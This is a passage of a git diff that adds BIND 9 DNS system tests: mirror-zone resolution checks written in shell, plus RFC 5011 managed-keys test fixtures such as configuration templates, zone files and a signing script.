"failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that loading a journal for a correctly signed mirror zone succeeds ($n)" +ret=0 +stop_server --use-rndc --port ${CONTROLPORT} ns3 +cp ns3/verify-journal.db.mirror ns3/verify-ixfr.db.mirror +cp ns3/verify-journal.db.good.mirror.jnl ns3/verify-ixfr.db.mirror.jnl +nextpart ns3/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns3 +wait_for_load verify-ixfr ${UPDATED_SERIAL_GOOD} ns3/named.run +$DIG $DIGOPTS @10.53.0.3 +norec verify-ixfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${UPDATED_SERIAL_GOOD}.*; serial" dig.out.ns3.test$n > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-ixfr.*mirror zone is now in use" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking delegations sourced from a mirror zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 foo.example A +norec > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null && ret=1 +# Check that a delegation containing a DS RRset and glue is present. +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "example.*IN.*NS" dig.out.ns3.test$n > /dev/null || ret=1 +grep "example.*IN.*DS" dig.out.ns3.test$n > /dev/null || ret=1 +grep "ns2.example.*A.*10.53.0.2" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that resolution involving a mirror zone works as expected ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 foo.example A > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +# Ensure ns1 was not queried. +grep "query 'foo.example/A/IN'" ns1/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that non-recursive queries for names below mirror zone get responded from cache ($n)" +ret=0 +# Issue a non-recursive query for an RRset which is expected to be in cache. +$DIG $DIGOPTS @10.53.0.3 +norec foo.example. A > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +# Ensure the response is not a delegation. +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "foo.example.*IN.*A.*127.0.0.1" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that delegations from cache which improve mirror zone delegations are properly handled ($n)" +ret=0 +# First, issue a recursive query in order to cache an RRset which is not within +# the mirror zone's bailiwick. +$DIG $DIGOPTS @10.53.0.3 sub.example. NS > dig.out.ns3.test$n.1 2>&1 || ret=1 +# Ensure the child-side NS RRset is returned. +grep "NOERROR" dig.out.ns3.test$n.1 > /dev/null || ret=1 +grep "ANSWER: 2" dig.out.ns3.test$n.1 > /dev/null || ret=1 +grep "sub.example.*IN.*NS" dig.out.ns3.test$n.1 > /dev/null || ret=1 +# Issue a non-recursive query for something below the cached zone cut. +$DIG $DIGOPTS @10.53.0.3 +norec foo.sub.example. A > dig.out.ns3.test$n.2 2>&1 || ret=1 +# Ensure the cached NS RRset is returned in a delegation, along with the +# parent-side DS RRset. +grep "NOERROR" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "sub.example.*IN.*NS" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "sub.example.*IN.*DS" dig.out.ns3.test$n.2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking flags set in a DNSKEY response sourced from a mirror zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 . DNSKEY > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking flags set in a SOA response sourced from a mirror zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 . SOA > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that resolution succeeds with unavailable mirror zone data ($n)" +ret=0 +wait_for_transfer initially-unavailable +# Query for a record in a zone that is set up to be mirrored, but +# untransferrable from the configured primary. Resolution should still succeed. +$DIG $DIGOPTS @10.53.0.3 foo.initially-unavailable. A > dig.out.ns3.test$n.1 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n.1 > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.1 > /dev/null || ret=1 +# Sanity check: the authoritative server should have been queried. +nextpart ns2/named.run | grep "query 'foo.initially-unavailable/A/IN'" > /dev/null || ret=1 +# Reconfigure ns2 so that the zone can be mirrored on ns3. +sed '/^zone "initially-unavailable" {$/,/^};$/ { + s/10.53.0.254/10.53.0.3/ +}' ns2/named.conf > ns2/named.conf.modified +mv ns2/named.conf.modified ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +# Flush the cache on ns3 and retransfer the mirror zone. +$RNDCCMD 10.53.0.3 flush > /dev/null 2>&1 +nextpart ns3/named.run > /dev/null +$RNDCCMD 10.53.0.3 retransfer initially-unavailable > /dev/null 2>&1 +wait_for_transfer initially-unavailable +# Query for the same record again. Resolution should still succeed. +$DIG $DIGOPTS @10.53.0.3 foo.initially-unavailable. A > dig.out.ns3.test$n.2 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.2 > /dev/null || ret=1 +# Ensure the authoritative server was not queried. +nextpart ns2/named.run | grep "query 'foo.initially-unavailable/A/IN'" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that resolution succeeds with expired mirror zone data ($n)" +ret=0 +# Reconfigure ns2 so that the zone from the previous test can no longer be +# mirrored on ns3. +sed '/^zone "initially-unavailable" {$/,/^};$/ { + s/10.53.0.3/10.53.0.254/ +}' ns2/named.conf > ns2/named.conf.modified +mv ns2/named.conf.modified ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +# Stop ns3, update the timestamp of the zone file to one far in the past, then +# restart ns3. +stop_server --use-rndc --port ${CONTROLPORT} ns3 +touch -t 200001010000 ns3/initially-unavailable.db.mirror +nextpart ns3/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns3 +# Ensure named attempts to retransfer the zone due to its expiry. +wait_for_transfer initially-unavailable +# Ensure the expected messages were logged. +nextpartpeek ns3/named.run | grep "initially-unavailable.*expired" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "initially-unavailable.*mirror zone is no longer in use" > /dev/null || ret=1 +# Query for a record in the expired zone. Resolution should still succeed. +$DIG $DIGOPTS @10.53.0.3 foo.initially-unavailable. A > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +# Sanity check: the authoritative server should have been queried. +nextpart ns2/named.run | grep "query 'foo.initially-unavailable/A/IN'" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that clients without cache access cannot retrieve mirror zone data ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 -b 10.53.0.3 +norec . SOA > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "REFUSED" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that outgoing transfers of mirror zones are disabled by default ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 . AXFR > dig.out.ns3.test$n 2>&1 || ret=1 +grep "; Transfer failed" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that notifies are disabled by default for mirror zones ($n)" +ret=0 +grep "initially-unavailable.*sending notifies" ns3/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking output of \"rndc zonestatus\" for a mirror zone ($n)" +ret=0 +$RNDCCMD 10.53.0.3 zonestatus . > rndc.out.ns3.test$n 2>&1 +grep "type: mirror" rndc.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that \"rndc reconfig\" properly handles a mirror -> secondary zone type change ($n)" +ret=0 +# Sanity check before we start. +$DIG $DIGOPTS @10.53.0.3 +norec verify-reconfig SOA > dig.out.ns3.test$n.1 2>&1 || ret=1 +grep "NOERROR" dig.out.ns3.test$n.1 > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n.1 > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.1 > /dev/null || ret=1 +# Reconfigure the zone so that it is no longer a mirror zone. +# (NOTE: Keep the embedded newline in the sed function list below.) +sed '/^zone "verify-reconfig" {$/,/^};$/ { + s/type mirror;/type secondary;/ +}' ns3/named.conf > ns3/named.conf.modified +mv ns3/named.conf.modified ns3/named.conf +nextpart ns3/named.run > /dev/null +rndc_reconfig ns3 10.53.0.3 +# Zones whose type was changed should not be reusable, which means the tested +# zone should have been reloaded from disk. +wait_for_load verify-reconfig ${ORIGINAL_SERIAL} ns3/named.run +# Ensure responses sourced from the reconfigured zone have AA=1 and AD=0. +$DIG $DIGOPTS @10.53.0.3 +norec verify-reconfig SOA > dig.out.ns3.test$n.2 2>&1 || ret=1 +grep "NOERROR" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.2 > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that \"rndc reconfig\" properly handles a secondary -> mirror zone type change ($n)" +ret=0 +# Put an incorrectly signed version of the zone in the zone file used by ns3. +nextpart ns3/named.run > /dev/null +cat ns2/verify-reconfig.db.bad.signed > ns3/verify-reconfig.db.mirror +# Reconfigure the zone so that it is a mirror zone again. +# (NOTE: Keep the embedded newline in the sed function list below.) +sed '/^zone "verify-reconfig" {$/,/^};$/ { + s/type secondary;/type mirror;/ +}' ns3/named.conf > ns3/named.conf.modified +mv ns3/named.conf.modified ns3/named.conf +rndc_reconfig ns3 10.53.0.3 +# The reconfigured zone should fail verification. +wait_for_load verify-reconfig ${UPDATED_SERIAL_BAD} ns3/named.run +$DIG $DIGOPTS @10.53.0.3 +norec verify-reconfig SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "${UPDATED_SERIAL_BAD}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpart ns3/named.run | grep "No correct ${DEFAULT_ALGORITHM} signature for verify-reconfig SOA" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that a mirror zone can be added using rndc ($n)" +ret=0 +# Sanity check: the zone should not exist in the root zone. +$DIG $DIGOPTS @10.53.0.3 +norec verify-addzone SOA > dig.out.ns3.test$n.1 2>&1 || ret=1 +grep "NXDOMAIN" dig.out.ns3.test$n.1 > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n.1 > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.1 > /dev/null || ret=1 +# Mirror a zone which does not exist in the root zone. +nextpart ns3/named.run > /dev/null +$RNDCCMD 10.53.0.3 addzone verify-addzone '{ type mirror; primaries { 10.53.0.2; }; };' > rndc.out.ns3.test$n 2>&1 || ret=1 +wait_for_transfer verify-addzone +# Check whether the mirror zone was added and whether it behaves as expected. +$DIG $DIGOPTS @10.53.0.3 +norec verify-addzone SOA > dig.out.ns3.test$n.2 2>&1 || ret=1 +grep "NOERROR" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n.2 > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that a mirror zone can be deleted using rndc ($n)" +ret=0 +# Remove the mirror zone added in the previous test. +nextpart ns3/named.run > /dev/null +$RNDCCMD 10.53.0.3 delzone verify-addzone > rndc.out.ns3.test$n 2>&1 || ret=1 +wait_for_log 20 "zone verify-addzone/IN: mirror zone is no longer in use; reverting to normal recursion" ns3/named.run || ret=1 +# Check whether the mirror zone was removed. +$DIG $DIGOPTS @10.53.0.3 +norec verify-addzone SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/mkeys/README b/bin/tests/system/mkeys/README new file mode 100644 index 0000000..25637bf --- /dev/null +++ b/bin/tests/system/mkeys/README @@ -0,0 +1,34 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +This is for testing RFC 5011 Automated Updates of DNSSEC Trust Anchors. + +ns1 is the root server that offers new KSKs and hosts one record for +testing. The TTL for the zone's records is 2 seconds. + +ns2 is a validator that uses managed keys. "-T mkeytimers=2/20/40" +is used so it will attempt do automated updates frequently. "-T tat=1" +is used so it will send TAT queries once per second. + +ns3 is a validator with a broken initializing key in trust-anchors. + +ns4 is a validator with a deliberately broken managed-keys.bind and +managed-keys.jnl, causing RFC 5011 initialization to fail. + +ns5 is a validator which is prevented from getting a response from the +root server, causing key refresh queries to fail. + +ns6 is a validator which has unsupported algorithms, one at start up, +one because of an algorithm rollover. + +ns7 is a validator with multiple views configured. It is used for +testing per-view rndc commands and checking interactions between options +related to and potentially affecting RFC 5011 processing. diff --git a/bin/tests/system/mkeys/clean.sh b/bin/tests/system/mkeys/clean.sh new file mode 100644 index 0000000..3f297a2 --- /dev/null +++ b/bin/tests/system/mkeys/clean.sh @@ -0,0 +1,33 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */K* */*.signed */trusted.conf */*.jnl */*.bk +rm -f */island.conf +rm -f */private.conf +rm -f */managed*.conf ns1/managed.key ns1/managed.key.id +rm -f */managed-keys.bind* */named.secroots +rm -f */named.conf +rm -f */named.memstats */named.run */named.run.prev +rm -f dig.out* delv.out* rndc.out* signer.out* +rm -f dsset-. ns1/dsset-. +rm -f ns*/managed-keys.bind* +rm -f ns*/named.lock +rm -f ns1/dsset-sub.tld. +rm -f ns1/dsset-tld. +rm -f ns1/named.secroots ns1/root.db.signed* ns1/root.db.tmp +rm -f ns1/zone.key +rm -f ns3/broken.conf +rm -f ns4/dsset-sub.foo. +rm -f ns5/named.args +rm -f ns7/view1.mkeys ns7/view2.mkeys +rm -rf ns4/nope diff --git a/bin/tests/system/mkeys/ns1/named1.conf.in b/bin/tests/system/mkeys/ns1/named1.conf.in new file mode 100644 index 0000000..6ca16e1 --- /dev/null +++ b/bin/tests/system/mkeys/ns1/named1.conf.in @@ -0,0 +1,59 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +acl allowed { + ! 10.53.0.5; + any; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify no; + dnssec-validation yes; + allow-query { allowed; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db.signed"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "tld" { + type primary; + file "tld.db.signed"; +}; + +zone "sub.tld" { + type primary; + file "sub.tld.db.signed"; +}; diff --git a/bin/tests/system/mkeys/ns1/named2.conf.in b/bin/tests/system/mkeys/ns1/named2.conf.in new file mode 100644 index 0000000..4bfb436 --- /dev/null +++ b/bin/tests/system/mkeys/ns1/named2.conf.in @@ -0,0 +1,57 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +acl allowed { + ! 10.53.0.5; + any; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify no; + dnssec-validation yes; + allow-query { allowed; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +zone "tld" { + type primary; + file "tld.db.signed"; +}; + +zone "sub.tld" { + type primary; + file "sub.tld.db.signed"; +}; diff --git a/bin/tests/system/mkeys/ns1/named3.conf.in b/bin/tests/system/mkeys/ns1/named3.conf.in new file mode 100644 index 0000000..aa8709b --- /dev/null +++ b/bin/tests/system/mkeys/ns1/named3.conf.in @@ -0,0 +1,51 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify no; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +zone "tld" { + type primary; + file "tld.db.signed"; +}; + +zone "sub.tld" { + type primary; + file "sub.tld.db.signed"; +}; diff --git a/bin/tests/system/mkeys/ns1/root.db b/bin/tests/system/mkeys/ns1/root.db new file mode 100644 index 0000000..bc83788 --- /dev/null +++ b/bin/tests/system/mkeys/ns1/root.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 20 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 2 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +; no delegation + +example. TXT "This is a test." + +tld. NS ns.tld. +ns.tld. A 10.53.0.1 diff --git a/bin/tests/system/mkeys/ns1/sign.sh b/bin/tests/system/mkeys/ns1/sign.sh new file mode 100644 index 0000000..fa57307 --- /dev/null +++ b/bin/tests/system/mkeys/ns1/sign.sh @@ -0,0 +1,94 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=sub.tld +zonefile=sub.tld.db + +keyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk $zone) +zskkeyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $zone) + +$SIGNER -Sg -o $zone $zonefile > /dev/null 2>/dev/null +keyfile_to_initial_ds $keyname > island.conf +cp island.conf ../ns5/island.conf + +zone=tld +zonefile=tld.db + +keyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk $zone) +zskkeyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $zone) + +$SIGNER -Sg -o $zone $zonefile > /dev/null 2>/dev/null + +zone=. +zonefile=root.db + +keyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk $zone) +zskkeyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $zone) + +$SIGNER -Sg -o $zone $zonefile > /dev/null 2>/dev/null + +# Configure the resolving server with an initializing key. +keyfile_to_initial_ds $keyname > managed.conf +cp managed.conf ../ns2/managed.conf +cp managed.conf ../ns4/managed.conf +cp managed.conf ../ns5/managed.conf + +# Configure broken trust anchor for ns3 +# Rotate each nibble in the digest by -1 +$DSFROMKEY $keyname.key | +awk '!/^; /{ + printf "trust-anchors {\n" + printf "\t\""$1"\" initial-ds " + printf $4 " " $5 " " $6 " \"" + for (i=7; i<=NF; i++) { + # rotate digest + digest=$i + gsub("0", ":", digest) + gsub("1", "0", digest) + gsub("2", "1", digest) + gsub("3", "2", digest) + gsub("4", "3", digest) + gsub("5", "4", digest) + gsub("6", "5", digest) + gsub("7", "6", digest) + gsub("8", "7", digest) + gsub("9", "8", digest) + gsub("A", "9", digest) + gsub("B", "A", digest) + gsub("C", "B", digest) + gsub("D", "C", digest) + gsub("E", "D", digest) + gsub("F", "E", digest) + gsub(":", "F", digest) + printf digest + } + printf "\";\n" + printf "};\n" + }' > ../ns3/broken.conf + +# Configure a static key to be used by delv. +keyfile_to_static_ds $keyname > trusted.conf + +# Prepare an unsupported algorithm key. +unsupportedkey=Kunknown.+255+00000 +cp unsupported.key "${unsupportedkey}.key" + +# +# Save keyname and keyid for managed key id test. +# +echo "$keyname" > managed.key +echo "$zskkeyname" > zone.key +keyfile_to_key_id $keyname > managed.key.id diff --git a/bin/tests/system/mkeys/ns1/sub.tld.db b/bin/tests/system/mkeys/ns1/sub.tld.db new file mode 100644 index 0000000..35d4361 --- /dev/null +++ b/bin/tests/system/mkeys/ns1/sub.tld.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 20 +sub.tld. IN SOA marka.isc.org. ns.sub.tld. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 2 ; minimum + ) +sub.tld. NS ns.sub.tld. +ns.sub.tld. A 10.53.0.1 diff --git a/bin/tests/system/mkeys/ns1/tld.db b/bin/tests/system/mkeys/ns1/tld.db new file mode 100644 index 0000000..5c54e0e --- /dev/null +++ b/bin/tests/system/mkeys/ns1/tld.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 20 +tld. IN SOA marka.isc.org. ns.tld. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 2 ; minimum + ) +tld. NS ns.tld. +ns.tld. A 10.53.0.1 +sub.tld. NS ns.sub.tld. +ns.sub.tld. A 10.53.0.1 diff --git a/bin/tests/system/mkeys/ns1/unsupported.key b/bin/tests/system/mkeys/ns1/unsupported.key new file mode 100644 index 0000000..7435d03 --- /dev/null +++ b/bin/tests/system/mkeys/ns1/unsupported.key @@ -0,0 +1 @@ +. IN DNSKEY 257 3 255 BJiXuidPHuGIne8GlCBLG+Oq/FZruQd2s3uBo+SxY16NUP/Vwl8MctMK62KsblDU1gIJAdEMVep2tsOkuSm0bIbJ8NBex+N9rSvzH2YJlDCT9QnNfv4q5RRTcVA3lk9nkmWHo6zcAT33yuS+THOCSznOMCJRq8JGZ6xqMJLv9FucuK6CCe6QBAZ5e98dpyGTWQLu7AERKKFqda9YCk3KQfdzx/HZ4SpQpRLncIXvGm1PIMT8Ar95NB/BsFJGwr5ZTaQtRYOXf2DD7wD3pfMsTJCdZyC0J0EtGBG109I+Oou1cswUfqZLXip/aV3eaBAUqLcZpg8P8vAbrvEq4uMS4OMZeXL6nu0irrdS1Pqmax8RsC+x3fg9EBH3QmHroJZtiU5h+0x4qApp7HE4Z5zFRuxIp9iB diff --git a/bin/tests/system/mkeys/ns2/named.args b/bin/tests/system/mkeys/ns2/named.args new file mode 100644 index 0000000..2f752bd --- /dev/null +++ b/bin/tests/system/mkeys/ns2/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D mkeys-ns2 -X named.lock -g -T maxcachesize=2097152 -T mkeytimers=5/10/20 -T tat=1 diff --git a/bin/tests/system/mkeys/ns2/named.conf.in b/bin/tests/system/mkeys/ns2/named.conf.in new file mode 100644 index 0000000..2f823b8 --- /dev/null +++ b/bin/tests/system/mkeys/ns2/named.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation auto; + bindkeys-file "managed.conf"; + servfail-ttl 0; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/mkeys/ns3/named.args b/bin/tests/system/mkeys/ns3/named.args new file mode 100644 index 0000000..2015ee5 --- /dev/null +++ b/bin/tests/system/mkeys/ns3/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D mkeys-ns3 -X named.lock -g -T maxcachesize=2097152 -T mkeytimers=5/10/20 diff --git a/bin/tests/system/mkeys/ns3/named.conf.in b/bin/tests/system/mkeys/ns3/named.conf.in new file mode 100644 index 0000000..d5e483f --- 